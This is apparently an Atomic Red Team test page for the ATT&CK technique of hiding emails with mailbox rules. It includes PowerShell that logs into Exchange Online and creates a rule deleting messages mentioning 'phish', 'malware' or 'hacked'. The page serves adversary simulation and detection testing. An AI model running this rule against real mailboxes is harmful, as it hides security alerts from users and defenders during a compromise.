T1564.008 - Hide Artifacts: Email Hiding Rules

Description from ATT&CK

Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule) Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security) In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).

Atomic Tests


Atomic Test #1 - New-Inbox Rule to Hide E-mail in M365

This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body. Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf

Supported Platforms: Azure-ad

auto_generated_guid: 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | auth_username | M365 Username | string | john@contoso.com| | auth_password | M365 Password | string | p4sswd| | mail_rulename | Name of the inbox rule. | string | default| | target_mailbox | Mailbox you are creating the rule in | string | jane@contoso.com|

Attack Commands: Run with
1
powershell
!

1
2
3
4
5
Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true

Cleanup Commands:

1
2
3
4
5
Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential
Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false

Dependencies: Run with
1
powershell
!

Description: ExchangeOnlineManagement module must be installed.
Check Prereq Commands:
1
try {if (Get-InstalledModule -Name ExchangeOnlineManagement -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
1
Install-Module -Name ExchangeOnlineManagement -Force